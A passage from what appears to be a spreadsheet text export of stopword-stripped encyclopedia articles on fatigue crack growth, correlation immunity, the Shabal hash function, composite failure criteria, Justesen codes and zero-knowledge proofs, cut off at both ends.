{a}{w}}{\bigg ]}^{4}+{\frac {0.857+0.265{\frac {a}{w}}}{{\big [}1-{\frac {a}{w}}{\big ]}^{\frac {3}{2}}}}{\bigg ]},\\\delta k_{i}&amp;=k_{\text{max}}-k_{\text{min}}=\beta \delta \sigma {\sqrt {\pi a}}.\end{aligned}}} following parameters considered calculation {\displaystyle a_{0}=5} {\displaystyle w=100} {\displaystyle h=200} {\displaystyle k_{\text{ic}}=30{\text{ mpa}}{\sqrt {\text{m}}}} {\displaystyle r={\frac {k_{\text{min}}}{k_{\text{max}}}}=0.7} {\displaystyle \delta \sigma =20} mpa, 4.6774 cycle {\displaystyle c=4.6774\times 10^{-11}{\frac {\text{m}}{\text{cycle}}}{\frac {1}{({\text{mpa}}{\sqrt {\text{m}}})^{m}}}} 3.874 {\displaystyle m=3.874} critical crack length, {\displaystyle a=a_{c}} computed {\displaystyle k_{\text{max}}=k_{\text{ic}}} 0.45 {\displaystyle a_{c}={\frac {1}{\pi }}{\bigg (}{\frac {0.45}{\beta }}{\bigg )}^{2}.} solving equation, critical crack length obtained 26.7 {\displaystyle a_{c}=26.7{\text{mm}}} now, invoking paris–erdogan equation gives 0.265 0.857 0.265 {\displaystyle n_{f}={\frac {1}{c(\delta \sigma )^{m}({\sqrt {\pi }})^{m}}}\int _{a_{0}}^{a_{c}}{\frac {da}{a^{\frac {m}{2}}{\bigg [}0.265{\bigg [}1-{\frac {a}{w}}{\bigg ]}^{4}+{\frac {0.857+0.265{\frac {a}{w}}}{{\big [}1-{\frac {a}{w}}{\big ]}^{\frac {3}{2}}}}{\bigg ]}^{m}}}} numerical integration expression, total number load cycles failure obtained 1.2085 cycles {\displaystyle n_{f}=1.2085\times 10^{6}{\text{ cycles}}} references external links forman, shivakumar, cardinal, williams, mckeighan, (2005). "fatigue crack growth database damage tolerance analysis" (pdf). faa. retrieved july 2019. gallagher, giessler, berens, engle, "usaf damage tolerant design handbook: guidelines analysis design damage tolerant aircraft structures. revision archived original july 2019. retrieved july 2019. "damage tolerance assessment handbook volume introduction, fracture mechanics, fatigue crack propagation" (pdf). federal aviation administration. 1993. retrieved july 2019.</t>
  </si>
  <si>
    <t>Correlation immunity</t>
  </si>
  <si>
    <t>mathematics, correlation immunity boolean function measure degree outputs uncorrelated subset inputs. specifically, boolean function said correlation-immune order every subset fewer variables {\displaystyle x_{1},x_{2},\ldots ,x_{n}} statistically independent value {\displaystyle f(x_{1},x_{2},\ldots ,x_{n})} definition function {\displaystyle f:\mathbb _{2}^{n}\rightarrow \mathbb _{2}} {\displaystyle order correlation immune independent {\displaystyle binary random variables {\displaystyle x_{0}\ldots x_{n-1}} random variable {\displaystyle z=f(x_{0},\ldots ,x_{n-1})} independent random vector {\displaystyle (x_{i_{1}}\ldots x_{i_{k}})} {\displaystyle 0\leq i_{1}&lt;\ldots &lt;i_{k}&lt;n} results cryptography when used stream cipher combining function linear feedback shift registers, boolean function low-order correlation-immunity susceptible correlation attack function correlation immunity high order. siegenthaler showed correlation immunity boolean function algebraic degree variables satisfies given input variables, means high algebraic degree restrict maximum possible correlation immunity. furthermore, function balanced references further reading cusick, thomas stanica, pantelimon (2009). "cryptographic boolean functions applications". academic press. isbn 9780123748904.</t>
  </si>
  <si>
    <t>Shabal</t>
  </si>
  <si>
    <t>shabal cryptographic hash function submitted france-funded research project saphir nist's international competition hash functions. saphir partners research partners saphir (with exception liens) initiated conception shabal later joined partners research project saphir2 actively contributed final design shabal. saphir (security analysis hash primitives) funded project hash functions. saphir started march 2006 duration three years brought five partners together: cryptolog international, dcssi, france telecom (leader), gemalto liens. partners saphir2 come industry academia; addition partners saphir, partners: eads inria, sagem sécurité uvsq joined contributed project. history shabal entry nist hash function competition, passed second round, failed enter final round. shabal selected finalist mainly security concerns. although security full hash algorithm compromised, discovery non-randomness properties time complexities raised concerns among nist's cryptographers possibility powerful attacks future.the name algorithm chosen tribute sébastien chabal. description shabal uses mode operation considered variant wide-pipe, merkle–damgård hash construction. internal state shabal consists three parts, denoted keyed permutation shabal updates using nonlinear feedback shift registers interact other. main loop permutation uses modular multiplication three five, modular addition, xor, complementation, operations. chaining mode shabal works follows: pm,c message block, counter. after processing message blocks, three finalization rounds applied message block counter values fixed. tunable parameters defined shabal, number loops performed within permutation, size default value 12). additionally, satisfy internal function used output sizes shabal. output sizes shabal output sizes shabal, based length digest are: shabal-192 shabal-224 shabal-256 shabal-384 shabal-512 outputs shabal example shabal hashes: shabal-192: cb6e700f ce4dcf97 d2bbbf00 0c5364fb b40c8732 0d733948 shabal-224: 14a6dd99 e8d207f9 f7187681 326f6930 8bcaae00 25f4855f 3120ba43 shabal-256: c0088fda 9aba672a 79d0bd56 07ae488e 095e2114 06855b3b 1877a349 a2543f99 shabal-384: 3312de9d da850d91 03785c3a c611b112 5d1bcafc 033755d2 3b8ee05e 15251e4e 636a724f f0a8e584 4aabeaaf 122fc0c4 shabal-512: c6168015 0a3f1fc8 688dd952 8e9e2fed 23ef9578 bce2a7cb a5d80961 e6c9e632 9701a5a6 f037b89f 20c6c44e dc7931e7 2bb5ab82 b3adcd32 9ce25056 22305e98 security various distinguishers proposed permutation shabal. using cube testers, statistical non-randomness property shabal's permutation described time complexity 2300. rotational distinguisher keyed permutation shabal using 2171 calls presented. distinguisher based observation operations preserve rotational relationships inputs. however, attack cannot extended hash algorithm, non-symmetric addition block counter existence finalization rounds. another distinguisher presented, based observation multiplication three preserves difference significant probability one. using observation, authors presented method find semi-equivalent keys keyed permutation. under related-key model, authors also presented method distinguishes random permutation using single query. method generalized security parameter. authors also presented method find pseudo-collisions pseudosecond-preimages variant shabal number iterations finalization instead however, attack work original shabal, since possible cancel differences number iterations some non-randomness properties shown keyed permutation easy verify. authors proposed simple method find fixed points inputs permutation selected affected loops permutation. method independent number words number rounds; therefore, method works choice tunable security parameters. authors also showed construct many, large multi-collisions, difference input. distinguisher presented biased output bits using differential analysis data complexity. weight (45-bit) pseudo-collision attack shabal compression function time complexity presented. preimage attack 2497 time 2400 memory complexity shabal using security parameters 12). none distinguishers directly threatens claimed security hash algorithm. moreover, designers modified indifferentiability security proof chaining mode require weaker assumptions ideal ciphers. implementations codeplex hashlib metacpan digest-shabal-0.05 perl) burstcoin (java) crates.io shabal (rust) references</t>
  </si>
  <si>
    <t>Tsai-Hill failure criterion</t>
  </si>
  <si>
    <t>tsai–hill failure criterion phenomenological material failure theories, widely used anisotropic composite materials different strengths tension compression. tsai-hill criterion predicts failure failure index laminate reaches tsai–hill failure criterion plane stress tsai-hill criterion based energy theory interactions stresses. rupture appears when: {\displaystyle {\begin{aligned}\left({\cfrac {\sigma _{11}}{x_{11}}}\right)^{2}-\left({\cfrac {\sigma _{11}\sigma _{22}}{x_{11}^{2}}}\right)+\left({\cfrac {\sigma _{22}}{x_{22}}}\right)^{2}+\left({\cfrac {\tau _{12}}{s_{12}}}\right)^{2}\geq 1\end{aligned}}} where: {\displaystyle {\begin{aligned}x_{11}\end{aligned}}} allowable strength longitudinal direction direction) {\displaystyle {\begin{aligned}x_{22}\end{aligned}}} allowable strength transversal direction (90° direction) {\displaystyle {\begin{aligned}s_{12}\end{aligned}}} allowable in-plane shear strength longitudinal transversal directions {\displaystyle tsai hill criterion interactive, i.e. stresses different directions decoupled affect failure simultaneously. furthermore, failure mode independent criterion, predict material fail, opposed mode-dependent criteria hashin criterion, puck failure criterion. this important types failure critical others. references</t>
  </si>
  <si>
    <t>Justesen code</t>
  </si>
  <si>
    <t>coding theory, justesen codes form class error-correcting codes constant rate, constant relative distance, constant alphabet size. before justesen error correction code discovered, error correction code known three parameters constant. subsequently, codes property discovered, example expander codes. these codes important applications computer science construction small-bias sample spaces. justesen codes derived code concatenation reed–solomon code wozencraft ensemble. reed–solomon codes used achieve constant rate constant relative distance expense alphabet size linear message length. wozencraft ensemble family codes achieve constant rate constant alphabet size, relative distance constant codes family. concatenation codes first encodes message using reed–solomon code, encodes symbol codeword using code wozencraft ensemble using different code ensemble position codeword. this different usual code concatenation inner codes position. justesen code constructed efficiently using logarithmic space. definition justesen code concatenation {\displaystyle (n,k,d)_{q^{k}}} outer code {\displaystyle c_{out}} different {\displaystyle (n,k,d)_{q}} inner codes {\displaystyle c_{in}^{i}} {\displaystyle 1\leq i\leq more precisely, concatenation codes, denoted {\displaystyle c_{out}\circ (c_{in}^{1},...,c_{in}^{n})} defined follows. given message {\displaystyle m\in [q^{k}]^{k}} compute codeword produced outer code {\displaystyle c_{out}} {\displaystyle c_{out}(m)=(c_{1},c_{2},..,c_{n})} then apply code linear inner codes coordinate codeword produce final codeword; {\displaystyle c_{out}\circ (c_{in}^{1},..,c_{in}^{n})(m)=(c_{in}^{1}(c_{1}),c_{in}^{2}(c_{2}),..,c_{in}^{n}(c_{n}))} look back definition outer code linear inner codes, definition justesen code makes sense codeword outer code vector {\displaystyle elements, {\displaystyle linear inner codes apply {\displaystyle elements. here justesen code, outer code {\displaystyle c_{out}} chosen reed solomon code field {\displaystyle \mathbb _{q^{k}}} evaluated {\displaystyle \mathbb _{q^{k}}-\{0\}} rate {\displaystyle {\displaystyle {\displaystyle {\displaystyle outer code {\displaystyle c_{out}} relative distance {\displaystyle \delta _{out}=1-r} block length {\displaystyle n=q^{k}-1} inner codes wozencraft ensemble {\displaystyle \{c_{in}^{\alpha }\}_{\alpha \mathbb _{q^{k}}^{*}}} property justesen code linear codes wonzencraft ensemble rate {\displaystyle {\frac {1}{2}}} justesen code concatenated code {\displaystyle c^{*}=c_{out}\circ (c_{in}^{1},c_{in}^{2},..,c_{in}^{n})} rate {\displaystyle {\frac {r}{2}}} following theorem estimates distance concatenated code {\displaystyle c^{*}} theorem {\displaystyle \varepsilon &gt;0.} then {\displaystyle c^{*}} relative distance least {\displaystyle (1-r-\varepsilon )h_{q}^{-1}\left({\tfrac {1}{2}}-\varepsilon \right).} proof order prove lower bound distance code {\displaystyle c^{*}} prove hamming distance arbitrary distinct pair codewords lower bound. {\displaystyle \delta (c^{1},c^{2})} hamming distance codewords {\displaystyle c^{1}} {\displaystyle c^{2}} given {\displaystyle m_{1}\neq m_{2}\in \left(\mathbb _{q^{k}}\right)^{k},} want lower bound {\displaystyle \delta (c^{*}(m_{1}),c^{*}(m_{2})).} notice {\displaystyle c_{out}(m)=(c_{1},\cdots ,c_{n})} {\displaystyle c^{*}(m)=(c_{in}^{1}(c_{1}),\cdots ,c_{in}^{n}(c_{n}))} lower bound {\displaystyle \delta (c^{*}(m_{1}),c^{*}(m_{2}))} need take account distance {\displaystyle c_{in}^{1},\cdots ,c_{in}^{n}.} suppose {\displaystyle {\begin{aligned}c_{out}(m_{1})&amp;=\left(c_{1}^{1},\cdots ,c_{n}^{1}\right)\\c_{out}(m_{2})&amp;=\left(c_{1}^{2},\cdots ,c_{n}^{2}\right)\end{aligned}}} recall {\displaystyle \left\{c_{in}^{1},\cdots ,c_{in}^{n}\right\}} wozencraft ensemble. "wonzencraft ensemble theorem", least {\displaystyle (1-\varepsilon linear codes {\displaystyle c_{in}^{i}} distance {\displaystyle h_{q}^{-1}\left({\tfrac {1}{2}}-\varepsilon \right)\cdot 2k.} {\displaystyle 1\leqslant i\leqslant n,c_{i}^{1}\neq c_{i}^{2}} code {\displaystyle c_{in}^{i}} distance {\displaystyle \geqslant h_{q}^{-1}\left({\tfrac {1}{2}}-\varepsilon \right)\cdot 2k,} {\displaystyle \delta \left(c_{in}^{i}\left(c_{i}^{1}\right),c_{in}^{i}\left(c_{i}^{2}\right)\right)\geqslant h_{q}^{-1}\left({\tfrac {1}{2}}-\varepsilon \right)\cdot 2k.} further, {\displaystyle numbers {\displaystyle 1\leqslant i\leqslant {\displaystyle c_{i}^{1}\neq c_{i}^{2}} code {\displaystyle c_{in}^{i}} distance {\displaystyle \geqslant h_{q}^{-1}({\tfrac {1}{2}}-\varepsilon )\cdot 2k,} {\displaystyle \delta \left(c^{*}(m_{1}),c^{*}(m_{2})\right)\geqslant h_{q}^{-1}\left({\tfrac {1}{2}}-\varepsilon \right)\cdot 2k\cdot final task find lower bound {\displaystyle define: {\displaystyle s=\left\{i\ 1\leqslant i\leqslant n,c_{i}^{1}\neq c_{i}^{2}\right\}.} then {\displaystyle number linear codes {\displaystyle c_{in}^{i},i\in distance {\displaystyle h_{q}^{-1}\left({\tfrac {1}{2}}-\varepsilon \right)\cdot 2k.} want estimate {\displaystyle |s|.} obviously {\displaystyle |s|=\delta (c_{out}(m_{1}),c_{out}(m_{2}))\geqslant (1-r)n} wozencraft ensemble theorem, {\displaystyle \varepsilon linear codes distance less {\displaystyle h_{q}^{-1}({\tfrac {1}{2}}-\varepsilon )\cdot 2k,} {\displaystyle t\geqslant |s|-\varepsilon n\geqslant (1-r)n-\varepsilon n=(1-r-\varepsilon )n.} finally, {\displaystyle \delta (c^{*}(m_{1}),c^{*}(m_{2}))\geqslant h_{q}^{-1}\left({\tfrac {1}{2}}-\varepsilon \right)\cdot 2k\cdot t\geqslant h_{q}^{-1}\left({\tfrac {1}{2}}-\varepsilon \right)\cdot 2k\cdot (1-r-\varepsilon )\cdot this true arbitrary {\displaystyle m_{1}\neq m_{2}} {\displaystyle c^{*}} relative distance least {\displaystyle (1-r-\varepsilon )h_{q}^{-1}\left({\tfrac {1}{2}}-\varepsilon \right),} completes proof. comments want consider "strongly explicit code". question "strongly explicit code" loosely speaking, linear code, "explicit" property related complexity constructing generator matrix that effect means compute matrix logarithmic space without using brute force algorithm verify code given satisfied distance. codes linear, consider complexity encoding algorithm. far, wonzencraft ensemble reed-solomon codes strongly explicit. therefore, following result: corollary: concatenated code {\displaystyle c^{*}} asymptotically good code(that rate {\displaystyle relative distance {\displaystyle \delta small strongly explicit construction. example justesen code following slightly different code referred justesen code macwilliams/macwilliams. particular case above-considered justesen code particular wonzencraft ensemble: reed-solomon code length rank minimum weight symbols elements gf(2m) codewords obtained taking every polynomial degree less listing values non-zero elements predetermined order. primitive element codeword (a1, ..., vector length given {\displaystyle \mathbf =\left(a_{1},a_{1},a_{2},\alpha ^{1}a_{2},\ldots ,a_{n},\alpha ^{n-1}a_{n}\right)} vector length obtained expressing element binary vector length justesen code linear code containing parameters code length dimension minimum distance least {\displaystyle \sum _{i=1}^{\ell }i{\binom {2m}{i}},} {\displaystyle \ell greatest integer satisfying {\displaystyle \sum _{i=1}^{\ell }{\binom {2m}{i}}\leq n-k+1} (see macwilliams/macwilliams proof.) also wozencraft ensemble concatenated error correction code reed-solomon error correction linear code references lecture justesen code. coding theory's course. prof. atri rudra. lecture concatenated codes. forney codes. justesen codes. essential coding theory. justesen (1972). class constructive asymptotically good algebraic codes". ieee trans. inf. theory. (5): 652–656. doi:10.1109/tit.1972.1054893. f.j. macwilliams; n.j.a. sloane (1977). theory error-correcting codes. north-holland. 306–316. isbn 0-444-85193-3.</t>
  </si>
  <si>
    <t>Tsai–Wu failure criterion</t>
  </si>
  <si>
    <t>tsai–wu failure criterion phenomenological material failure theory widely used anisotropic composite materials different strengths tension compression. tsai-wu criterion predicts failure failure index laminate reaches this failure criterion specialization general quadratic failure criterion proposed gol'denblat kopnov expressed form {\displaystyle f_{i}~\sigma _{i}+f_{ij}~\sigma _{i}~\sigma _{j}\leq {\displaystyle ij=1\dots repeated indices indicate summation, {\displaystyle f_{i},f_{ij}} experimentally determined material strength parameters. stresses {\displaystyle \sigma _{i}} expressed voigt notation. failure surface closed convex, interaction terms {\displaystyle f_{ij}} must satisfy {\displaystyle f_{ii}f_{jj}-f_{ij}^{2}\geq implies {\displaystyle f_{ii}} terms must positive. tsai–wu failure criterion orthotropic materials orthotropic materials three planes symmetry oriented coordinate directions, assume {\displaystyle f_{ij}=f_{ji}} coupling normal shear stress terms (and shear terms), general form tsai–wu failure criterion reduces {\displaystyle {\begin{aligned}f_{1}\sigma _{1}+&amp;f_{2}\sigma _{2}+f_{3}\sigma _{3}+f_{4}\sigma _{4}+f_{5}\sigma _{5}+f_{6}\sigma _{6}\\&amp;+f_{11}\sigma _{1}^{2}+f_{22}\sigma _{2}^{2}+f_{33}\sigma _{3}^{2}+f_{44}\sigma _{4}^{2}+f_{55}\sigma _{5}^{2}+f_{66}\sigma _{6}^{2}\\&amp;\qquad +2f_{12}\sigma _{1}\sigma _{2}+2f_{13}\sigma _{1}\sigma _{3}+2f_{23}\sigma _{2}\sigma _{3}\leq 1\end{aligned}}} failure strength uniaxial tension compression three directions anisotropy {\displaystyle \sigma _{1t},\sigma _{1c},\sigma _{2t},\sigma _{2c},\sigma _{3t},\sigma _{3c}} also, assume shear strengths three planes symmetry {\displaystyle \tau _{23},\tau _{12},\tau _{31}} (and magnitude plane even signs different). then coefficients orthotropic tsai–wu failure criterion {\displaystyle {\begin{aligned}f_{1}=&amp;{\cfrac {1}{\sigma _{1t}}}-{\cfrac {1}{\sigma _{1c}}}~;~~f_{2}={\cfrac {1}{\sigma _{2t}}}-{\cfrac {1}{\sigma _{2c}}}~;~~f_{3}={\cfrac {1}{\sigma _{3t}}}-{\cfrac {1}{\sigma _{3c}}}~;~~f_{4}=f_{5}=f_{6}=0\\f_{11}=&amp;{\cfrac {1}{\sigma _{1c}\sigma _{1t}}}~;~~f_{22}={\cfrac {1}{\sigma _{2c}\sigma _{2t}}}~;~~f_{33}={\cfrac {1}{\sigma _{3c}\sigma _{3t}}}~;~~f_{44}={\cfrac {1}{\tau _{23}^{2}}}~;~~f_{55}={\cfrac {1}{\tau _{31}^{2}}}~;~~f_{66}={\cfrac {1}{\tau _{12}^{2}}}\\\end{aligned}}} coefficients {\displaystyle f_{12},f_{13},f_{23}} determined using equibiaxial tests. failure strengths equibiaxial tension {\displaystyle \sigma _{1}=\sigma _{2}=\sigma _{b12},\sigma _{1}=\sigma _{3}=\sigma _{b13},\sigma _{2}=\sigma _{3}=\sigma _{b23}} {\displaystyle {\begin{aligned}f_{12}&amp;={\cfrac {1}{2\sigma _{b12}^{2}}}\left[1-\sigma _{b12}(f_{1}+f_{2})-\sigma _{b12}^{2}(f_{11}+f_{22})\right]\\f_{13}&amp;={\cfrac {1}{2\sigma _{b13}^{2}}}\left[1-\sigma _{b13}(f_{1}+f_{3})-\sigma _{b13}^{2}(f_{11}+f_{33})\right]\\f_{23}&amp;={\cfrac {1}{2\sigma _{b23}^{2}}}\left[1-\sigma _{b23}(f_{2}+f_{3})-\sigma _{b23}^{2}(f_{22}+f_{33})\right]\end{aligned}}} near impossibility performing equibiaxial tests severe lack experimental data parameters {\displaystyle f_{12},f_{13},f_{23}} shown tsai-wu criterion particular case generalized hill yield criterion. tsai-wu failure criterion transversely isotropic materials transversely isotropic material, plane isotropy 1–2, {\displaystyle f_{1}=f_{2}~;~~f_{4}=f_{5}=f_{6}=0~;~~f_{11}=f_{22}~;~~f_{44}=f_{55}~;~~f_{13}=f_{23}~.} then tsai–wu failure criterion reduces {\displaystyle {\begin{aligned}f_{2}(\sigma _{1}+\sigma _{2})&amp;+f_{3}\sigma _{3}+f_{22}(\sigma _{1}^{2}+\sigma _{2}^{2})+f_{33}\sigma _{3}^{2}+f_{44}(\sigma _{4}^{2}+\sigma _{5}^{2})+f_{66}\sigma _{6}^{2}\\&amp;\qquad +2f_{12}\sigma _{1}\sigma _{2}+2f_{23}(\sigma _{1}+\sigma _{2})\sigma _{3}\leq 1\end{aligned}}} {\displaystyle f_{66}=2(f_{11}-f_{12})} this theory applicable unidirectional composite lamina fiber direction '3'-direction. order maintain closed ellipsoidal failure surfaces stress states, tsai also proposed stability conditions take following form transversely isotropic materials {\displaystyle f_{22}~f_{33}-f_{23}^{2}\geq 0~;~~f_{11}^{2}-f_{12}^{2}\geq 0~.} tsai–wu failure criterion plane stress case plane stress {\displaystyle \sigma _{1}=\sigma _{5}=\sigma _{6}=0} tsai–wu failure criterion reduces {\displaystyle f_{2}\sigma _{2}+f_{3}\sigma _{3}+f_{22}\sigma _{2}^{2}+f_{33}\sigma _{3}^{2}+f_{44}\sigma _{4}^{2}+2f_{23}\sigma _{2}\sigma _{3}\leq strengths expressions {\displaystyle f_{i},f_{ij}} interpreted, case lamina, {\displaystyle \sigma _{1c}} transverse compressive strength, {\displaystyle \sigma _{1t}} transverse tensile strength, {\displaystyle \sigma _{3c}} longitudinal compressive strength, {\displaystyle \sigma _{3t}} longitudinal strength, {\displaystyle \tau _{23}} longitudinal shear strength, {\displaystyle \tau _{12}} transverse shear strength. tsai–wu criterion foams tsai–wu criterion closed cell foams plane strain conditions expressed {\displaystyle f_{2}\sigma _{2}+f_{3}\sigma _{3}+f_{22}\sigma _{2}^{2}+f_{33}\sigma _{3}^{2}+2f_{23}\sigma _{2}\sigma _{3}=1-k^{2}} {\displaystyle f_{23}=-{\cfrac {1}{2}}{\sqrt {f_{22}f_{33}}}~;~~k={\cfrac {\sigma _{4}}{\tau _{23}}}~.} diab divinycell h250 foam (density kg/cu.m.), values strengths {\displaystyle \sigma _{2c}=4.6} mpa, {\displaystyle \sigma _{2t}=7.3} mpa, {\displaystyle \sigma _{3c}=6.3} mpa, {\displaystyle \sigma _{3t}=10} mpa.for aluminum foams plane stress, simplified form tsai–wu criterion used assume tensile compressive failure strengths shear effects failure strength. this criterion written {\displaystyle 3~{\tilde {j}}_{2}+(\eta ^{2}-1)~{\tilde {i}}_{1}^{2}=\eta ^{2}} {\displaystyle {\tilde {j}}_{2}:={\tfrac {1}{3}}\left({\cfrac {\sigma _{1}^{2}}{\sigma _{1c}^{2}}}-{\cfrac {\sigma _{1}\sigma _{2}}{\sigma _{1c}\sigma _{2c}}}+{\cfrac {\sigma _{2}^{2}}{\sigma _{2c}^{2}}}\right)~;~~{\tilde {i}}_{1}:={\cfrac {\sigma _{1}}{\sigma _{1c}}}+{\cfrac {\sigma _{2}}{\sigma _{2c}}}} tsai–wu criterion bone tsai–wu failure criterion also applied trabecular bone/cancellous bone varying degrees success. quantity {\displaystyle f_{12}} shown nonlinear dependence density bone. also material failure theory yield (engineering) references</t>
  </si>
  <si>
    <t>Zero-knowledge proof</t>
  </si>
  <si>
    <t>cryptography, zero-knowledge proof zero-knowledge protocol method party (the prover) prove another party (the verifier) given statement true prover avoids conveying additional information apart fact statement indeed true. essence zero-knowledge proofs trivial prove possesses knowledge certain information simply revealing challenge prove possession without revealing information additional information.if proving statement requires prover possess secret information, verifier able prove statement anyone else without possessing secret information. statement proved must include assertion prover knowledge, without including transmitting knowledge assertion. otherwise, statement would proved zero-knowledge provides verifier additional information statement protocol. zero-knowledge proof knowledge special case statement consists fact prover possesses secret information. interactive zero-knowledge proofs require interaction individual computer system) proving knowledge individual validating proof.a protocol implementing zero-knowledge proofs knowledge must necessarily require interactive input verifier. this interactive input usually form challenges responses prover convince verifier statement true, i.e., prover possess claimed knowledge. case, verifier could record execution protocol replay convince someone else possess secret information. party's acceptance either justified since replayer possess information (which implies protocol leaked information, thus, proved zero-knowledge), acceptance spurious, i.e., accepted someone actually possess information. some forms non-interactive zero-knowledge proofs exist, validity proof relies computational assumptions (typically assumptions ideal cryptographic hash function). abstract examples baba cave there well-known story presenting fundamental ideas zero-knowledge proofs, first published 1990 jean-jacques quisquater others paper "how explain zero-knowledge protocols your children". common practice label parties zero-knowledge proof peggy (the prover statement) victor (the verifier statement). story, peggy uncovered secret word used open magic door cave. cave shaped like ring, entrance side magic door blocking opposite side. victor wants know whether peggy knows secret word; peggy, private person, want reveal knowledge (the secret word) victor reveal fact knowledge world general. they label left right paths entrance first, victor waits outside cave peggy goes peggy takes either path victor allowed path takes. then, victor enters cave shouts name path wants return, either chosen random. providing really know magic word, easy: opens door, necessary, returns along desired path. however, suppose know word. then, would able return named path victor give name path entered. since victor would choose random, would chance guessing correctly. repeat trick many times, times row, chance successfully anticipating victor's requests would become vanishingly small 220, roughly million). thus, peggy repeatedly appears exit victor names, conclude extremely probable peggy does, fact, know secret word. side note respect third-party observers: even victor wearing hidden camera records whole transaction, thing camera record case victor shouting "a!" peggy appearing case victor shouting "b!" peggy appearing recording type would trivial people fake (requiring peggy victor agree beforehand sequence victor shout). such recording certainly never convincing anyone original participants. fact, even person present observer original experiment would unconvinced, since victor peggy might orchestrated whole "experiment" start finish. further notice victor chooses flipping coin on-camera, protocol loses zero-knowledge property; on-camera coin flip would probably convincing person watching recording later. thus, although reveal secret word victor, make possible victor convince world general peggy knowledge—counter peggy's stated wishes. however, digital cryptography generally "flips coins" relying pseudo-random number generator, akin coin fixed pattern heads tails known coin's owner. victor's coin behaved way, would possible victor peggy faked "experiment", using pseudo-random number generator would reveal peggy's knowledge world using flipped coin would. notice peggy could prove victor knows magic word, without revealing him, single trial. victor peggy together mouth cave, victor watch peggy come this would prove certainty peggy knows magic word, without revealing magic word victor. however, proof could observed third party, recorded victor proof would convincing anybody. words, peggy could refute proof claiming colluded victor, therefore longer control aware knowledge. balls colour-blind friend imagine friend red-green colour-blind (while not) balls: green, otherwise identical. friend seem completely identical skeptical actually distinguishable. want prove fact differently-coloured, nothing else; particular, want reveal green ball. here proof system. give balls friend puts behind back. next, takes balls brings behind back displays places behind back chooses reveal balls, picking random equal probability. you, "did switch ball?" this whole procedure repeated often necessary. looking colours, can, course, certainty whether switched them. hand, colour hence indistinguishable, could guess correctly probability higher 50%. since probability would randomly succeeded identifying switch/non-switch 50%, probability randomly succeeded switch/non-switches approaches zero ("soundness"). friend repeat "proof" multiple times (e.g. times), friend become convinced ("completeness") balls indeed differently coloured. proof zero-knowledge friend never learns ball green red; indeed, gains knowledge distinguish balls. definition zero-knowledge proof statement must satisfy three properties: completeness: statement true, honest verifier (that following protocol properly) convinced fact honest prover. soundness: statement false, cheating prover convince honest verifier true, except small probability. zero-knowledge: statement true, verifier learns anything fact statement true. words, knowing statement (not secret) sufficient imagine scenario showing prover knows secret. this formalized showing every verifier simulator that, given statement proved (and access prover), produce transcript "looks like" interaction honest prover verifier question.the first properties general interactive proof systems. third makes proof zero-knowledge.zero-knowledge proofs proofs mathematical sense term small probability, soundness error, cheating prover able convince verifier false statement. words, zero-knowledge proofs probabilistic "proofs" rather deterministic proofs. however, techniques decrease soundness error negligibly small values.a formal definition zero-knowledge computational model, common turing machine. {\displaystyle {\displaystyle {\displaystyle turing machines. interactive proof system {\displaystyle (p,v)} language {\displaystyle zero-knowledge probabilistic polynomial time (ppt) verifier {\displaystyle {\hat {v}}} exists simulator {\displaystyle view {\displaystyle \forall x\in l,z\in \{0,1\}^{*},\operatorname {view} _{\hat {v}}\left[p(x)\leftrightarrow {\hat {v}}(x,z)\right]=s(x,z)} view {\displaystyle \operatorname {view} _{\hat {v}}\left[p(x)\leftrightarrow {\hat {v}}(x,z)\right]} record interactions {\displaystyle p(x)} {\displaystyle {\hat {v}}(x,z)} prover {\displaystyle modeled unlimited computation power practice, {\displaystyle usually probabilistic turing machine). intuitively, definition states interactive proof system {\displaystyle (p,v)} zero-knowledge verifier {\displaystyle {\hat {v}}} exists efficient simulator {\displaystyle (depending {\displaystyle {\hat {v}}} reproduce conversation {\displaystyle {\displaystyle {\hat {v}}} given input. auxiliary string {\displaystyle definition plays role "prior knowledge" (including random coins {\displaystyle {\hat {v}}} definition implies {\displaystyle {\hat {v}}} cannot prior knowledge string {\displaystyle mine information conversation {\displaystyle {\displaystyle also given prior knowledge reproduce conversation {\displaystyle {\hat {v}}} {\displaystyle before.the definition given perfect zero-knowledge. computational zero-knowledge obtained requiring views verifier {\displaystyle {\hat {v}}} simulator computationally indistinguishable, given auxiliary string. practical examples discrete given value apply ideas realistic cryptography application. peggy wants prove victor knows discrete given value given group.for example, given value {\displaystyle large prime {\displaystyle generator {\displaystyle wants prove knows value {\displaystyle {\displaystyle g^{x}{\bmod {p}}=y} without revealing {\displaystyle indeed, knowledge {\displaystyle could used proof identity, peggy could knowledge chose random value {\displaystyle reveal anyone, computed {\displaystyle y=g^{x}{\bmod {p}}} distributed value {\displaystyle potential verifiers, later time, proving knowledge {\displaystyle equivalent proving identity peggy. protocol proceeds follows: round, peggy generates random number {\displaystyle computes {\displaystyle c=g^{r}{\bmod {p}}} discloses victor. after receiving {\displaystyle victor randomly issues following requests: either requests peggy discloses value {\displaystyle value {\displaystyle (x+r){\bmod {(p-1)}}} with either answer, peggy disclosing random value, information disclosed correct execution round protocol. victor verify either answer; requested {\displaystyle compute {\displaystyle g^{r}{\bmod {p}}} verify matches {\displaystyle requested {\displaystyle (x+r){\bmod {(p-1)}}} verify {\displaystyle consistent this, computing {\displaystyle g^{(x+r){\bmod {(p-1)}}}{\bmod {p}}} verifying matches {\displaystyle (c\cdot y){\bmod {p}}} peggy indeed knows value {\displaystyle respond either victor's possible challenges. peggy knew could guess challenge victor going issue, could easily cheat convince victor knows {\displaystyle not: knows victor going request {\displaystyle proceeds normally: picks {\displaystyle computes {\displaystyle c=g^{r}{\bmod {p}}} discloses {\displaystyle victor; able respond victor's challenge. hand, knows victor request {\displaystyle (x+r){\bmod {(p-1)}}} picks random value {\displaystyle computes {\displaystyle c'=g^{r'}\cdot \left(g^{x}\right)^{-1}{\bmod {p}}} discloses {\displaystyle victor value {\displaystyle expecting. when victor challenges reveal {\displaystyle (x+r){\bmod {(p-1)}}} reveals {\displaystyle victor verify consistency, since turn compute {\displaystyle g^{r'}{\bmod {p}}} matches {\displaystyle c'\cdot since peggy multiplied modular multiplicative inverse {\displaystyle however, either scenarios victor issues challenge expecting manufactured result, unable respond challenge assumption infeasibility solving discrete group. picked {\displaystyle disclosed {\displaystyle c=g^{r}{\bmod {p}}} unable produce valid {\displaystyle (x+r){\bmod {(p-1)}}} would pass victor's verification, given know {\displaystyle picked value {\displaystyle poses {\displaystyle (x+r){\bmod {(p-1)}}} would respond discrete value disclosed peggy know discrete log, since value disclosed obtained arithmetic known values, computing power known exponent. thus, cheating prover probability successfully cheating round. executing large enough number rounds, probability cheating prover succeeding made 